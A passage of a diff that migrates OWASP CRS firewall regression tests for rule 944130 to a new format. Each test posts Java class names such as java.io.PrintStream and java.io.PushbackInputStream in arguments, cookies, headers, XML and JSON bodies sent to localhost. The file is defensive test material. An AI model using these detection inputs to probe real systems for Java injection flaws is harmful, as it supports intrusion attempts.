\"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log: + expect_ids: [944130] + - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: 